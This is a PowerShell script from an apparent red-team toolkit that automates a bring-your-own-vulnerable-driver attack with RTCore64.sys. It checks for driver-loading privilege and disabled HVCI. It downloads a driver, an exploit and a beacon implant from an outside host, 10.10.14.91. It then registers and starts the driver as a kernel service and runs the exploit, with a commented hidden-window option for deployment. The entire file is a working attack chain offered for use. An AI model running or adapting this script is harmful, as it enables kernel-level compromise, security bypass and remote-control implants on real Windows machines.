# Prepare-RTCore64.ps1 # Automatiza: descarga driver + beacon + exploit → carga driver → ejecuta exploit # Requiere: SeLoadDriverPrivilege + HVCI desactivado Write-Host "[*] Start RTCore64.sys BYOVD Attack By LazyOwn RedTeam" -ForegroundColor Cyan # 1. Verificar privilegios: SeLoadDriverPrivilege Write-Host "[*] Checking Privs..." -ForegroundColor Yellow $privs = whoami /priv 2>$null | Select-String "SeLoadDriverPrivilege" if (-not $privs) { Write-Error "[-] SeLoadDriverPrivilege not enabled." exit 1 } Write-Host "[+] SeLoadDriverPrivilege: ENABLED" -ForegroundColor Green # 2. Verificar que HVCI/VBS está desactivado Write-Host "[*] Check state of Virtualization-Based Security (HVCI)..." -ForegroundColor Yellow $deviceGuard = Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard -ErrorAction SilentlyContinue if ($deviceGuard.VirtualizationBasedSecurityStatus -ne 0) { Write-Warning "[!] VBS/HVCI is Enabled. The exploit could be fail." } else { Write-Host "[+] VBS/HVCI: OFF → ¡Found VULN!" -ForegroundColor Green } # 3. Definir rutas y URLs $Path = "C:\Users\Administrator\Documents\" $DriverLocalPath = "$Path" + "RTCore64.sys" $ExploitLocalPath = "$Path" + "exploit.exe" $BeaconLocalPath = "$Path" + "beacon.exe" $DriverUrl = "http://10.10.14.91/RTCore64.sys" $ExploitUrl = "http://10.10.14.91/exploit.exe" $BeaconUrl = "http://10.10.14.91/beacon.exe" $ServiceName = "RTCore64" # 4. Descargar driver si no existe if (-not (Test-Path $DriverLocalPath)) { Write-Host "[*] Driver not found downloading $DriverUrl..." -ForegroundColor Yellow try { Invoke-WebRequest -Uri $DriverUrl -OutFile $DriverLocalPath -UseBasicParsing Write-Host "[+] Driver downloaded in $DriverLocalPath" -ForegroundColor Green } catch { Write-Error "[!] Error donwload driver: $_" exit 1 } } else { Write-Host "[+] Driver exist in $DriverLocalPath" -ForegroundColor Green } # 5. Descargar exploit Write-Host "[*] Download exploit from $ExploitUrl..." -ForegroundColor Yellow try { Invoke-WebRequest -Uri $ExploitUrl -OutFile $ExploitLocalPath -UseBasicParsing Write-Host "[+] Exploit donwloaded in $ExploitLocalPath" -ForegroundColor Green } catch { Write-Error "[!] Error downloading exploit: $_" exit 1 } # 6. Descargar beacon Write-Host "[*] Downloading beacon from $BeaconUrl..." -ForegroundColor Yellow try { Invoke-WebRequest -Uri $BeaconUrl -OutFile $BeaconLocalPath -UseBasicParsing Write-Host "[+] Beacon downloaded in $BeaconLocalPath" -ForegroundColor Green } catch { Write-Warning "[!] Error downloading beacon: $_ (continuando sin él)" } # 7. Verificar si el servicio ya existe y limpiarlo $existingService = Get-Service -Name $ServiceName -ErrorAction SilentlyContinue if ($existingService) { Write-Host "[*] Service $ServiceName exist, stoping and deleting..." -ForegroundColor Yellow Stop-Service $ServiceName -Force -ErrorAction SilentlyContinue sc.exe delete $ServiceName 2>$null Start-Sleep -Seconds 2 } # 8. Crear el servicio del driver Write-Host "[*] Witchcrafting malicious service driver..." -ForegroundColor Yellow $result = sc.exe create $ServiceName binPath= $DriverLocalPath type= kernel start= demand 2>&1 if ($LASTEXITCODE -ne 0) { Write-Error "[!] Error witchcrafting servicio: $result" exit 1 } Write-Host "[+] Service $ServiceName created successfully" -ForegroundColor Green # 9. Iniciar el servicio Write-Host "[*] Starting service $ServiceName..." -ForegroundColor Yellow $result = sc.exe start $ServiceName 2>&1 if ($LASTEXITCODE -ne 0) { Write-Error "[!] Error starting the service: $result" exit 1 } Write-Host "[+] Service $ServiceName started successfully" -ForegroundColor Green # 11. EJECUTAR EL EXPLOIT Write-Host "[*] Exploiting..." -ForegroundColor Magenta # Opción 1: Visible (recomendado para pruebas) & $ExploitLocalPath # Opción 2: Oculto (recomendado para deploy) #Start-Process -FilePath $ExploitLocalPath -WindowStyle Hidden -Wait